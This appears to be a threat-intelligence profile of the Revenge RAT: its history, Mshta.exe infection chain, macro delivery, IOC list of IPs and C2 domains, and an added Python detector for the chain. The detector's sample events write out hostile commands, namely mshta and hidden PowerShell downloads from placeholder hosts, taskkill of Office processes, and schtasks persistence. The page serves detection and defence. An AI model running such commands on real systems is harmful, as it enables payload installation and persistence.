Revenge

Revenge was one of the most popular remote access trojans in use in 2019, when it was featured in a huge malicious campaign named “Aggah”. This malware can take remote control of infected machines and spy on the victims.

Type: Trojan
Origin: Unknown
First seen: 1 January, 2016
Last seen: 31 March, 2020
Global rank: 30
Week rank: 23
Month rank: 23
IOCs: 978

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans, which means that attackers usually use it to control infected PCs remotely or to spy on users by monitoring keystrokes and even the computer's surroundings through remote webcam and microphone access.

Discovered for the first time in 2016, Revenge RAT continues to be a threat today, with a big spike in popularity observed in 2019, when the malware was seen targeting corporations and government structures all around the world in a massive malicious campaign codenamed “Aggah”. Thanks to a large variety of distribution methods, a robust core feature-set, and solid persistence mechanisms, Revenge has become a popular choice for cybercriminals. The popularity of this RAT was further aided by its open-source nature: anybody can freely download Revenge on underground hacking forums and employ it in their own campaigns.

General description of Revenge

The Revenge RAT was first observed in the wild in June 2016, when it was released by a user with the nickname Napoleon, an Arabic-speaking member of the underground hacking community.

The initial version of this malware was a simple malicious program that offered little, if any, code obfuscation and was mainly used by other Arabic-speaking cybercriminals. Despite the malware's simplicity, at the time only one out of 54 VirusTotal scanners flagged the Revenge code as malicious, which puzzled researchers given its lack of anti-analysis techniques.

The creator used Visual Basic to develop this RAT and personally admitted that the malware was very bare-bones at the time of its initial release, providing only the most basic functions and clearly losing to competitors in terms of core feature-set. According to Napoleon, this is why Revenge was available free of charge.

Two months after the initial release, the author issued a new version, v0.2, on a more popular hacking forum, this time with more features but still completely free of charge. Since then, Revenge has evolved even further; today it offers cybercriminals a wide range of capabilities, including remote file and registry alterations on an infected machine, access to memory, processes and services, and access to connected devices such as keyboards, webcams and mice, which allows the malware to record its victims' actions and collect information like banking credentials and social account data.

The core malicious feature-set was not the only thing that evolved over the course of Revenge's lifetime. Improvements in distribution and persistence made this threat truly a force to be reckoned with. In some campaigns, scripts were executed from the HTML of a custom blogspot [com] page.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service allows us to take a look at the execution of this malware as it unfolds.

Figure 1: The lifecycle of Revenge displayed in visual form. A process graph generated by ANY.RUN.

Figure 2: A customizable text report generated by the ANY.RUN malware analysis service, which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

The first steps of a Revenge trojan execution may vary depending on how it made its way onto the victim's computer. The most common initial infiltration vector relies on Mshta.exe, which either downloads the payload or executes it directly from a URL. Once the payload has been delivered to the infected machine, Mshta.exe changes the autorun value in the registry and starts three processes: cmd.exe, powershell.exe and schtasks.exe. cmd.exe is started to kill processes from a list; in the given example, processes from the Microsoft Office suite were targeted. Powershell.exe is launched to download the main payload. Schtasks.exe, in turn, creates a scheduled task that gives Revenge persistence on the infected system. After all these steps, the malware is ready to execute commands from its C2 servers.

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and up to date. Do not disable native Windows security features, update the OS regularly, and adhere to the best practices for staying safe online.

In particular, steer clear of downloading email attachments from unknown senders and never enable macros in Microsoft Office when prompted to do so by a file downloaded from a suspicious email.

Distribution of Revenge

Revenge has been distributed in a variety of ways, some of which are potentially more effective than others. For example, Revenge is known to infect PCs through malicious email attachments and malicious ads on compromised websites.

Most commonly, once delivered in a Microsoft Office file that the potential victim has downloaded and opened, Revenge uses macros to connect to an outside domain, sometimes hidden in a web page, from which additional scripts and content are downloaded until the actual malware is installed on the PC.
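The two passages above (the Mshta.exe execution chain and the Office-macro delivery stage) describe a process tree that endpoint telemetry can catch before the C2 stage. The following is an added example, not ANY.RUN's code: a small Python detector that runs the chain rules over constructed, Sysmon-like process-creation and registry-write events. The event fields, rule names, sample command lines and the example.invalid hostnames are all assumptions made for the illustration, not indicators from this page.

```python
"""Detection logic for the Revenge delivery chain described above
(Office macro -> Mshta.exe -> cmd.exe / powershell.exe / schtasks.exe,
plus an autorun value written to a Run key).

Added example, not code from ANY.RUN. Events are constructed, Sysmon-like
process-creation and registry records reduced to the fields the rules need;
image names are executable basenames, already lower-cased."""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
MSHTA_CHILDREN = {"cmd.exe", "powershell.exe", "schtasks.exe"}
RUN_KEY_FRAGMENT = "\\currentversion\\run\\"   # ...\Windows\CurrentVersion\Run\<value>


@dataclass
class Event:
    kind: str                 # "process" (creation) or "registry" (value write)
    pid: int
    image: str                # executable basename of the acting process
    parent_pid: int = 0
    parent_image: str = ""
    cmdline: str = ""
    target: str = ""          # registry key path, for "registry" events only


Finding = Tuple[str, str]     # (rule name, human-readable detail)


def detect(events: List[Event]) -> List[Finding]:
    """Apply the chain rules to events given in time order."""
    findings: List[Finding] = []
    children: Dict[int, Set[str]] = {}   # parent pid -> child image names seen
    image_of: Dict[int, str] = {}        # pid -> image name, for the summary rule

    for e in events:
        cmd = e.cmdline.lower()
        if e.kind == "process":
            image_of[e.pid] = e.image
            children.setdefault(e.parent_pid, set()).add(e.image)

            # Macro stage: an Office application launching a script host.
            if e.parent_image in OFFICE_APPS and e.image in SCRIPT_HOSTS:
                findings.append(("office_spawns_script_host",
                                 f"{e.parent_image} (pid {e.parent_pid}) -> {e.image} (pid {e.pid})"))
            # Mshta.exe handed a URL: remote download or direct execution.
            if e.image == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
                findings.append(("mshta_remote_url", e.cmdline))
            # The three helpers Mshta.exe starts in the described chain.
            if e.parent_image == "mshta.exe" and e.image in MSHTA_CHILDREN:
                findings.append(("mshta_spawns_helper",
                                 f"mshta.exe (pid {e.parent_pid}) -> {e.image} (pid {e.pid})"))
            # cmd.exe used to kill Office processes from a list.
            if e.image == "cmd.exe" and "taskkill" in cmd and any(a in cmd for a in OFFICE_APPS):
                findings.append(("cmd_kills_office", e.cmdline))
            # Persistence: a scheduled task created by a script host.
            if e.image == "schtasks.exe" and "/create" in cmd and e.parent_image in SCRIPT_HOSTS:
                findings.append(("schtasks_create_from_script_host", e.cmdline))
        elif e.kind == "registry":
            # Autorun value written by a script host.
            if e.image in SCRIPT_HOSTS and RUN_KEY_FRAGMENT in e.target.lower():
                findings.append(("script_host_writes_run_key", f"{e.image} (pid {e.pid}) -> {e.target}"))

    # Summary rule: one mshta.exe instance that spawned all three helpers.
    for pid, kids in children.items():
        if image_of.get(pid) == "mshta.exe" and MSHTA_CHILDREN <= kids:
            findings.append(("mshta_full_chain", f"mshta.exe (pid {pid}) spawned {sorted(MSHTA_CHILDREN)}"))
    return findings


def rule_names(findings: List[Finding]) -> List[str]:
    return [rule for rule, _ in findings]


# Constructed sample telemetry mirroring the chain in the text (hostnames are placeholders).
SAMPLE_EVENTS = [
    Event("process", 100, "winword.exe", 50, "explorer.exe", '"WINWORD.EXE" /n invoice.docm'),
    Event("process", 200, "mshta.exe", 100, "winword.exe", "mshta.exe https://stage.example.invalid/a.hta"),
    Event("registry", 200, "mshta.exe",
          target="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update"),
    Event("process", 301, "cmd.exe", 200, "mshta.exe",
          "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe"),
    Event("process", 302, "powershell.exe", 200, "mshta.exe",
          "powershell.exe -w hidden -c iwr https://payload.example.invalid/r.exe -OutFile $env:TEMP\\r.exe"),
    Event("process", 303, "schtasks.exe", 200, "mshta.exe",
          'schtasks.exe /create /sc minute /mo 5 /tn Update /tr "%TEMP%\\r.exe" /f'),
    Event("process", 400, "svchost.exe", 4, "services.exe", "svchost.exe -k netsvcs"),   # benign noise
]
BENIGN_EVENTS = [SAMPLE_EVENTS[0], SAMPLE_EVENTS[-1]]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Each individual rule will fire on some legitimate administration activity (schtasks.exe launched from a PowerShell deployment script, for instance), which is why the summary rule requires the whole mshta.exe fan-out before it reports the full chain; in practice the per-rule hits are better treated as scoring inputs than as standalone alerts.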

How to detect Revenge RAT using ANY.RUN?

Analysts can see which MITRE ATT&CK™ MATRIX techniques were applied by the malware by clicking the "ATT&CK™ MATRIX" button.

Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch as a Remote Access Trojan. It began its life as a simplistic malware with limited functionality and no anti-analysis features, but has evolved into a capable and persistent trojan used in massive attacks in Europe, North America, Asia, and the Middle East.

The popularity of this malware is due not only to its robust feature-set but also to its ready availability, since Revenge can be downloaded for free from a number of underground communities.

Professionals can establish a secure cyber defense against Revenge and similar RATs and secure their corporate or government networks by reverse engineering and studying a threat using malware hunting services like ANY.RUN.

IOCs

IP addresses
192.169.69.25
3.19.3.150
3.17.202.129
83.163.73.56
185.244.30.115
193.161.193.99
193.56.28.101
91.233.116.105
185.140.53.19
193.56.28.134
185.161.210.101
18.223.41.243
39.35.2.46
23.247.102.118
23.247.102.10
185.244.30.181
79.134.225.72
79.134.225.82
141.255.144.24
141.255.155.52
Hashes

Domains
roboticsnetwork.duckdns.org
britianica.uk.com
majul.com
elx01.knas.systems
coodyz.site
meeti.duckdns.org
systemserverrootmapforfiletrn.duckdns.org
santoxpri.duckdns.org
investmenteducationkungykmtsdy8agender.duckdns.org
ikorodu.duckdns.org
d3c00.duckdns.org
kungglobalinvestmenteductgpmstdy8addres.duckdns.org
qq12.duckdns.org
bossmandj.duckdns.org
tescohomegroseryandelectronicstday2store.duckdns.org
chnfrndwsdy1securityandgorvermentsocialf.duckdns.org
shgshg9nationalobjwsdyindustrialgoogler.duckdns.org
msofficewordfiletransfertotheadmintrue.duckdns.org
sweden2020.duckdns.org
donko.duckdns.org
